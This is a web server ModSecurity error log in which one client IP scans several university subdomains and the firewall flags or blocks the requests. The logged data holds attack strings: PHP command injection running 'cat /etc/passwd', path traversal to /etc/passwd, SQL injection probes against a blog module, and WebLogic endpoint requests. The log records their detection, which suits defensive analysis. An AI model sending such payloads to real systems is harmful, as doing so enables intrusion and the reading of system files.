[Tue Aug 29 11:47:40.373203 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAi2yJgAAAAN"]
[Tue Aug 29 11:47:40.376951 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjav3sAAAAV"]
[Tue Aug 29 11:47:40.380172 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAi2yJgAAAAN"]
[Tue Aug 29 11:47:40.382772 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAj117EAAAAa"]
[Tue Aug 29 11:47:40.384661 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjav3sAAAAV"]
[Tue Aug 29 11:47:40.387233 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAj117EAAAAa"]
[Tue Aug 29 11:47:40.390225 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjZRb4AAAAS"]
[Tue Aug 29 11:47:40.395243 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjZRb4AAAAS"]
[Tue Aug 29 11:47:40.419711 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhl0LUAAAAi"]
[Tue Aug 29 11:47:40.427504 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAhl0LUAAAAi"]
[Tue Aug 29 11:47:41.425957 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjZRcQAAAAS"]
[Tue Aug 29 11:47:41.435406 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjZRcQAAAAS"]
[Tue Aug 29 11:47:41.504960 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117YAAAAa"]
[Tue Aug 29 11:47:41.513156 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117YAAAAa"]
[Tue Aug 29 11:47:41.525094 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14bcCo-f0AAAkNPm4AAAAI"]
[Tue Aug 29 11:47:41.535218 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117cAAAAa"]
[Tue Aug 29 11:47:41.537127 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GgAAAAA"]
[Tue Aug 29 11:47:41.543310 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAj117cAAAAa"]
[Tue Aug 29 11:47:41.549994 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAjW9GgAAAAA"]
[Tue Aug 29 11:47:41.610378 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAfECFgAAAAO"]
[Tue Aug 29 11:47:41.618044 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bcCo-f0AAAfECFgAAAAO"]
[Tue Aug 29 11:47:41.679691 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bcCo-f0AAAfECFsAAAAO"]
[Tue Aug 29 11:47:42.357678 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAkNPnQAAAAI"]
[Tue Aug 29 11:47:42.360229 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAfECFwAAAAO"]
[Tue Aug 29 11:47:42.379853 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAj117sAAAAa"]
[Tue Aug 29 11:47:42.381745 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAjFoeoAAAAF"]
[Tue Aug 29 11:47:42.382843 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yJ4AAAAN"]
[Tue Aug 29 11:47:42.387935 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAhT4CYAAAAD"]
[Tue Aug 29 11:47:42.403160 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yJ8AAAAN"]
[Tue Aug 29 11:47:42.427543 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bsCo-f0AAAkNPnYAAAAI"]
[Tue Aug 29 11:47:42.432448 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bsCo-f0AAAkNPnYAAAAI"]
[Tue Aug 29 11:47:42.495388 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yKEAAAAN"]
[Tue Aug 29 11:47:42.497016 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAfECGAAAAAO"]
[Tue Aug 29 11:47:42.532345 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAkGCTYAAAAE"]
[Tue Aug 29 11:47:43.440175 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14b8Co-f0AAAkNPnoAAAAI"]
[Tue Aug 29 11:47:43.527159 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAj118EAAAAa"]
[Tue Aug 29 11:47:43.550541 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkGCTcAAAAE"]
[Tue Aug 29 11:47:43.612786 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAfECGIAAAAO"]
[Tue Aug 29 11:47:43.637118 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14b8Co-f0AAAkAL8MAAAAU"]
[Tue Aug 29 11:47:43.647074 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14b8Co-f0AAAkAL8MAAAAU"]
[Tue Aug 29 11:47:43.675456 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjM7GQAAAAT"]
[Tue Aug 29 11:47:43.694641 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14b8Co-f0AAAjav4UAAAAV"]
[Tue Aug 29 11:47:43.773414 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjav4YAAAAV"]
[Tue Aug 29 11:47:44.358601 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjtc3MAAAAX"]
[Tue Aug 29 11:47:44.360624 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAhT4CoAAAAD"]
[Tue Aug 29 11:47:44.362443 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAkGCTgAAAAE"]
[Tue Aug 29 11:47:44.367167 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjFofIAAAAF"]
[Tue Aug 29 11:47:44.393090 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAkBKngAAAAb"]
[Tue Aug 29 11:47:44.396719 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjFofMAAAAF"]
[Tue Aug 29 11:47:44.420837 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8V4AAAAR"]
[Tue Aug 29 11:47:44.421655 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjCbKwAAAAB"]
[Tue Aug 29 11:47:44.440414 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8V8AAAAR"]
